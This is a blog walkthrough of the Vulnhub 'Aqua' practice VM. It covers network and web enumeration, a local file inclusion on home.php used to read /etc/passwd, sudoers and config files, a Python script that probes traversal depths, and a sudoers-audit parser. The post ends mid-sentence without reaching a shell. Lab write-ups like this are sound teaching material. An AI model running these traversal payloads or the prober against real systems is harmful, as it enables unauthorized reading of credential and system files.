Vulnhub: Aqua target machine walkthrough (partial, only local file read was achieved)

Aqua

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Aqua]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:f3:da:85      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.246  08:00:27:bd:32:fa      1      60  PCS Systemtechnik GmbH        

Using netdiscover, which ships with Kali Linux, the target host is identified as 192.168.56.246 (192.168.56.1 is the host-only adapter and 192.168.56.100 the VirtualBox DHCP server).

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Aqua]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.246 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-01 06:24 EST
Nmap scan report for bogon (192.168.56.246)
Host is up (0.00010s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE    SERVICE     VERSION
21/tcp  filtered ftp
80/tcp  open     http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
139/tcp open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open     netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:BD:32:FA (Oracle VirtualBox virtual NIC)
Service Info: Host: LINUXLITE

Host script results:
|_clock-skew: mean: -2h40m01s, deviation: 4h37m07s, median: -1s
|_nbstat: NetBIOS name: LINUXLITE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-12-01T11:24:32
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: aqua
|   NetBIOS computer name: LINUXLITE\x00
|   Domain name: \x00
|   FQDN: aqua
|_  System time: 2022-12-01T19:24:32+08:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.00 seconds
                                                                  

The NMAP scan shows three open ports on the target: 80 (HTTP, Apache 2.4.18 on Ubuntu) and 139/445 (Samba 4.3.11). Port 21 (FTP) is reported as filtered rather than closed, which usually means a firewall rule drops the packets; the iptables rules recovered later confirm this. SMB signing is not required and guest access is accepted, so share enumeration is worth a try.

Getting a shell

┌──(kali㉿kali)-[~/Vulnhub/Aqua]
└─$ smbclient -L 192.168.56.246                                
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        liteshare       Disk      
        IPC$            IPC       IPC Service (Linux Lite Shares)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LINUXLITE
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Aqua]
└─$ smbclient //192.168.56.246/liteshare
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/Vulnhub/Aqua]
└─$ curl http://192.168.56.246                                     
<html>

<head>
        <link rel="shortcut icon" href="data:;base64,=">
</head>

<body>

<div align="center">
        <img src="./images/locked.gif" alt="locked" style="display:block;margin: 0 auto;">
        <p style="max-width: 75ch;border:3px;border-style:solid;border-color:black; padding:1em" align="justify"><strong>Help me! My computer has been hacked by Megumin and I have lost access to my computer password! If you help me, I'll tell everything about Megumin so you can help me to hack her back. Please?? ...</strong></p>
        <input type="submit" id="yes" name="yes" value="Sure, I'll help">
        <input type="submit" id="no" name="no" value="Nope, I'll pass">

        <script type="text/javascript">
                document.getElementById("yes").onclick = function(){
                        location.href = "yes.html"
                };
                document.getElementById("no").onclick = function(){
                        location.href = "no.html"
                };
        </script>

</div>

</body>
</html>
                  

Following the two buttons on the home page (yes.html / no.html) returns what looks like a username:password pair, but for which service?

┌──(kali㉿kali)-[~/Vulnhub/Aqua]
└─$ smbclient -U megumin //192.168.56.246/liteshare

The connection fails, so these are not credentials for the SMB share.

┌──(kali㉿kali)-[~/Vulnhub/Aqua]
└─$ gobuster dir -u http://192.168.56.246 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.246
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/01 06:30:37 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.56.246/images/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.246/css/]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.246/manual/]
/deployment           (Status: 301) [Size: 321] [--> http://192.168.56.246/deployment/]
/server-status        (Status: 403) [Size: 279]
/meow                 (Status: 301) [Size: 315] [--> http://192.168.56.246/meow/]
Progress: 214342 / 220561 (97.18%)===============================================================
2022/12/01 06:30:55 Finished
===============================================================

Gobuster finds several directories (/images, /css, /manual, /deployment, /meow). Rerunning with file extensions finds the pages themselves:

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.56.246 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.txt,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.246
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,php,sh,txt
[+] Timeout:                 10s
===============================================================
2022/12/01 06:39:50 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.56.246/images/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 927]
/home.php             (Status: 302) [Size: 158] [--> login.php]
/login.php            (Status: 200) [Size: 1801]
/welcome.php          (Status: 200) [Size: 935]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.246/css/]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.246/manual/]
/no.html              (Status: 200) [Size: 157]
/yes.html             (Status: 200) [Size: 272]
/deployment           (Status: 301) [Size: 321] [--> http://192.168.56.246/deployment/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/meow                 (Status: 301) [Size: 315] [--> http://192.168.56.246/meow/]
Progress: 1098274 / 1102805 (99.59%)===============================================================
2022/12/01 06:41:21 Finished
===============================================================

A login page (login.php) was found; logging in with the username and password obtained earlier from the home page succeeds.

After login, home.php takes a file name in its showcase parameter, which suggests local file inclusion:

http://192.168.56.246/home.php?showcase=index.php

Verify by requesting /etc/passwd through directory traversal:

http://192.168.56.246/home.php?showcase=../../../../../../etc/passwd

The file is returned. Note that home.php echoes the included text into an HTML page, so a browser shows it with newlines collapsed; curl or view-source gives the raw file:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false
ntp:x:109:119::/home/ntp:/bin/false
avahi:x:110:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:111:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
nm-openconnect:x:114:124:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/bin/false
nm-openvpn:x:115:125:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/bin/false
pulse:x:116:126:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:117:128:RealtimeKit,,,:/proc:/bin/false
saned:x:118:129::/var/lib/saned:/bin/false
usbmux:x:119:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
aqua:x:1000:1000:aqua,,,:/home/aqua:/bin/bash
mysql:x:120:131:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:121:132:ftp daemon,,,:/srv/ftp:/bin/false
megumin:x:1001:1001:,,,:/var/www/html/deployment:/bin/bash

Besides root, two accounts have a login shell:

aqua

megumin

aqua is uid 1000 with home /home/aqua; megumin is uid 1001 with home /var/www/html/deployment, i.e. inside the web root, which matches the /deployment directory found by gobuster.
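The traversal check and the passwd triage above, as an added example (not code from the original walkthrough): it builds the showcase= payloads at increasing depth, recognises a passwd dump even when the browser has collapsed it onto one line, and pulls out the accounts that matter, those with a real shell and those whose home directory sits under the web root. The target URL and parameter name are the ones from the post; the session cookie argument, the NOLOGIN_SHELLS set and SAMPLE_PASSWD (a constructed subset of the dump) are assumptions of this example.

```python
"""Probe the showcase= parameter of home.php for LFI and triage /etc/passwd.

Added example, not code from the original walkthrough. Assumes the target
URL and parameter name shown in the post and a logged-in session cookie
(home.php redirects to login.php without one); SAMPLE_PASSWD is a
constructed subset of the dump, space-joined the way the browser showed it.
"""
import re
import urllib.parse
import urllib.request

TARGET = "http://192.168.56.246/home.php"   # from the walkthrough
PARAM = "showcase"                             # the included-file parameter
WEBROOT = "/var/www/html"                      # DocumentRoot from 000-default.conf

# Shells that never give an interactive login; any other shell marks a real account.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}

# One passwd record: name:pw:uid:gid:gecos:home:shell. GECOS may contain spaces
# ("Mailing List Manager"), home and shell may not, which is what lets the regex
# re-split a space-joined dump. The lookbehind pins a record to start of string
# or whitespace so a word inside a GECOS field cannot start a new record.
PASSWD_RE = re.compile(
    r"(?<![^\s])([a-z_][a-z0-9_-]*):([^:\s]*):(\d+):(\d+):([^:]*?):([^:\s]+):([^:\s]+)"
)

SAMPLE_PASSWD = (  # constructed subset of the page's dump, as rendered (newlines collapsed)
    "root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin "
    "sync:x:4:65534:sync:/bin:/bin/sync www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin "
    "list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin "
    "syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false "
    "nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin "
    "aqua:x:1000:1000:aqua,,,:/home/aqua:/bin/bash mysql:x:120:131:MySQL Server,,,:/nonexistent:/bin/false "
    "ftp:x:121:132:ftp daemon,,,:/srv/ftp:/bin/false "
    "megumin:x:1001:1001:,,,:/var/www/html/deployment:/bin/bash"
)


def lfi_payloads(target_file, max_depth=8):
    """Yield traversal strings from shallow to deep: ../etc/passwd, ../../etc/passwd, ..."""
    rel = target_file.lstrip("/")
    for depth in range(1, max_depth + 1):
        yield "../" * depth + rel


def build_url(payload, base=TARGET, param=PARAM):
    """URL-encode the payload so the slashes survive any decoding on the way."""
    return base + "?" + urllib.parse.urlencode({param: payload})


def parse_passwd(body):
    """Return passwd records found anywhere in body, newline- or space-separated."""
    return [
        {"name": m[0], "uid": int(m[2]), "gid": int(m[3]), "home": m[5], "shell": m[6]}
        for m in PASSWD_RE.findall(body)
    ]


def looks_like_passwd(body):
    """True once the response carries at least one well-formed passwd record."""
    return bool(PASSWD_RE.search(body))


def login_users(body):
    """Accounts with a real shell: the names worth trying for password reuse."""
    return [u for u in parse_passwd(body) if u["shell"] not in NOLOGIN_SHELLS]


def users_homed_in_webroot(body, webroot=WEBROOT):
    """Accounts whose home directory sits under DocumentRoot (their files are web-reachable)."""
    return [u["name"] for u in parse_passwd(body) if u["home"].startswith(webroot + "/")]


def probe(cookie, target_file="/etc/passwd", timeout=5):
    """Walk traversal depths until the response looks like the requested file (network only)."""
    for payload in lfi_payloads(target_file):
        url = build_url(payload)
        req = urllib.request.Request(url, headers={"Cookie": cookie})  # assumed: PHPSESSID=... from the browser
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", "replace")
        except OSError:
            continue
        if looks_like_passwd(body):
            return url, body
    return None, None


if __name__ == "__main__":
    # Offline triage of the constructed sample; pass a real cookie to probe() for a live run.
    for u in login_users(SAMPLE_PASSWD):
        print(f"{u['name']:<10} uid={u['uid']:<6} home={u['home']}")
    print("homed in webroot:", users_homed_in_webroot(SAMPLE_PASSWD))
```

Run as-is it works only on the embedded sample; probe() is the live part and needs the cookie of the logged-in session, because home.php answers with a 302 to login.php otherwise. Stopping at the first depth that parses as passwd avoids hammering the target with every depth, and the same parser accepts the raw file if you fetched it with curl instead of the browser.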

Next, check whether remote file inclusion works by pointing the parameter at a file served from the attacking machine:

http://192.168.56.246/home.php?showcase=http://192.168.56.206:8000/test.txt

Nothing is returned, so remote inclusion is not possible (PHP's allow_url_include is off by default).

Check whether the Apache access log can be read:

http://192.168.56.246/home.php?showcase=../../../../../../../var/log/apache2/access.log

The following sensitive files can be retrieved the same way through the local file inclusion:

http://192.168.56.246/home.php?showcase=../../../../../../../etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root    ALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d

#modified by yunaranyancat
aqua ALL=(ALL) NOPASSWD: /root/quotes
aqua ALL=(ALL) NOPASSWD: /root/esp
aqua ALL=(ALL) NOPASSWD: /usr/bin/gdb
megumin ALL=(ALL) NOPASSWD: /home/aqua/Desktop/backdoor
http://192.168.56.246/home.php?showcase=../../../../../../../etc/apache2/sites-enabled/000-default.conf
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com

ServerAdmin webmaster@localhost
DocumentRoot /var/www/html

# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
http://192.168.56.246/home.php?showcase=../../../../../../../etc/iptables/rules.v4
# Generated by ip6tables-save v1.6.0 on Wed Jan 15 00:08:40 2020
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 21 -j DROP
COMMIT
# Completed on Wed Jan 15 00:08:40 2020
http://192.168.56.246/home.php?showcase=../../../../../../../etc/logrotate.conf
# see "man logrotate" for details
# rotate log files weekly
weekly

# use the syslog group by default, since this is the owning group
# of /var/log/syslog.
su root syslog

# keep 4 weeks worth of backlogs
rotate 4

# create new (empty) log files after rotating old ones
create

# uncomment this if you want your log files compressed
#compress

# packages drop log rotation information into this directory
include /etc/logrotate.d

# no packages own wtmp, or btmp -- we'll rotate them here
/var/log/wtmp {
    missingok
    monthly
    create 0664 root utmp
    rotate 1
}

/var/log/btmp {
    missingok
    monthly
    create 0660 root utmp
    rotate 1
}

# system-specific logs may be configured here

Summary:

DocumentRoot /var/www/html  # web root; megumin's home directory (/var/www/html/deployment) sits under it

-A INPUT -p tcp -m tcp --dport 21 -j DROP  # port 21 is dropped by the firewall, consistent with nmap reporting it as filtered

#modified by yunaranyancat  # commands these users can run as root via sudo without a password
aqua ALL=(ALL) NOPASSWD: /root/quotes
aqua ALL=(ALL) NOPASSWD: /root/esp

aqua ALL=(ALL) NOPASSWD: /usr/bin/gdb

megumin ALL=(ALL) NOPASSWD: /home/aqua/Desktop/backdoor

Note that megumin's rule points at a file under aqua's home directory, and that all of these rules apply to aqua and megumin, not to the web server user, so the file read alone does not unlock any of them.

/var/log/wtmp { # confirms the log directory is /var/log
    missingok
    monthly
    create 0664 root utmp
    rotate 1
}

/var/log/btmp {
    missingok
    monthly
    create 0660 root utmp
    rotate 1
}
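The sudoers reading above, as an added example (not code from the original walkthrough): a small parser that extracts user-privilege rules from a recovered sudoers dump, lists the NOPASSWD commands per user, and flags the three things worth noticing in this file: a command that is itself a shell escape (gdb can run shell commands from inside), custom binaries outside the system paths (/root/quotes, /root/esp), and a rule whose command lives in another user's home directory (megumin runs a file under /home/aqua). SAMPLE_SUDOERS is the rule section of the dump retyped one rule per line; SHELL_CAPABLE is an assumed list of binaries documented to execute other commands from inside.

```python
"""Parse a sudoers dump and flag NOPASSWD rules that need a second look.

Added example, not code from the original walkthrough. SAMPLE_SUDOERS is the
rule section of the recovered file, one rule per line; SHELL_CAPABLE is an
assumed short list of binaries that can run arbitrary commands from inside
(gdb's shell command, editors, pagers, interpreters), so a sudo rule on one
of them is effectively a sudo rule on a shell.
"""
import re
from dataclasses import dataclass, field

SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
root    ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
#includedir /etc/sudoers.d
#modified by yunaranyancat
aqua ALL=(ALL) NOPASSWD: /root/quotes
aqua ALL=(ALL) NOPASSWD: /root/esp
aqua ALL=(ALL) NOPASSWD: /usr/bin/gdb
megumin ALL=(ALL) NOPASSWD: /home/aqua/Desktop/backdoor
"""

# Assumption: binaries with a built-in way to run other commands; extend as needed.
SHELL_CAPABLE = {"gdb", "vim", "vi", "less", "more", "python", "python3", "perl", "find", "awk", "bash", "sh"}
SYSTEM_DIRS = ("/usr/", "/bin/", "/sbin/")
# Tags that may precede a command in a Cmnd_Spec; stripped before splitting the list.
TAG_RE = re.compile(
    r"\b(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT):\s*"
)
RULE_RE = re.compile(r"^(\S+)\s+(\S+?)\s*=\s*(.*)$")   # user host = spec
RUNAS_RE = re.compile(r"^\(([^)]*)\)\s*(.*)$")          # optional (runas) prefix
SKIP_PREFIXES = ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")


@dataclass
class Rule:
    user: str
    host: str
    runas: str
    nopasswd: bool
    commands: list = field(default_factory=list)


def parse_sudoers(text):
    """Return user-privilege rules; comments, Defaults and alias lines are skipped.

    Simplification: a NOPASSWD tag anywhere in the spec is taken to cover the whole
    command list (in real sudoers a tag applies to the commands that follow it).
    """
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user, host, rest = m.groups()
        runas = "root"                      # sudoers runas_default when no (runas) is given
        rm = RUNAS_RE.match(rest)
        if rm:
            runas, rest = rm.groups()
        nopasswd = "NOPASSWD:" in rest
        cmds = [c.strip() for c in TAG_RE.sub("", rest).split(",") if c.strip()]
        rules.append(Rule(user, host, runas, nopasswd, cmds))
    return rules


def nopasswd_commands(text):
    """user -> commands runnable without a password (what the post's summary lists)."""
    out = {}
    for r in parse_sudoers(text):
        if r.nopasswd:
            out.setdefault(r.user, []).extend(r.commands)
    return out


def risk_notes(rule):
    """Why each command in the rule deserves attention, as short strings."""
    notes = []
    for cmd in rule.commands:
        prog = cmd.split()[0]
        if prog == "ALL":
            notes.append(f"ALL: any command as {rule.runas}")
            continue
        if prog.rsplit("/", 1)[-1] in SHELL_CAPABLE:
            notes.append(f"{prog}: shell escape, equivalent to a shell as {rule.runas}")
        if prog.startswith("/home/"):
            owner = prog.split("/")[2]
            who = "the caller" if owner == rule.user else owner
            notes.append(f"{prog}: lives in /home/{owner}, so {who} controls what {rule.user} runs as {rule.runas}")
        elif not prog.startswith(SYSTEM_DIRS):
            notes.append(f"{prog}: custom binary outside the system paths, review it")
    return notes


def audit(text):
    """user -> notes for every NOPASSWD rule in the dump."""
    out = {}
    for r in parse_sudoers(text):
        if r.nopasswd:
            out.setdefault(r.user, []).extend(risk_notes(r))
    return out


if __name__ == "__main__":
    for user, notes in audit(SAMPLE_SUDOERS).items():
        for n in notes:
            print(f"{user}: {n}")
```

Run as-is it prints the notes for the sample; feed parse_sudoers() the raw text of any sudoers you recover (after restoring line breaks, since the browser-rendered dump collapses them and a comment would then swallow the rules that follow it).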

The Wappalyzer browser extension shows that the target runs Ubuntu (the nmap banners Apache/2.4.18 (Ubuntu) and Samba 4.3.11-Ubuntu say the same), so /var/log/dpkg.log

posted @ 2022-12-01 20:18  Jason_huawen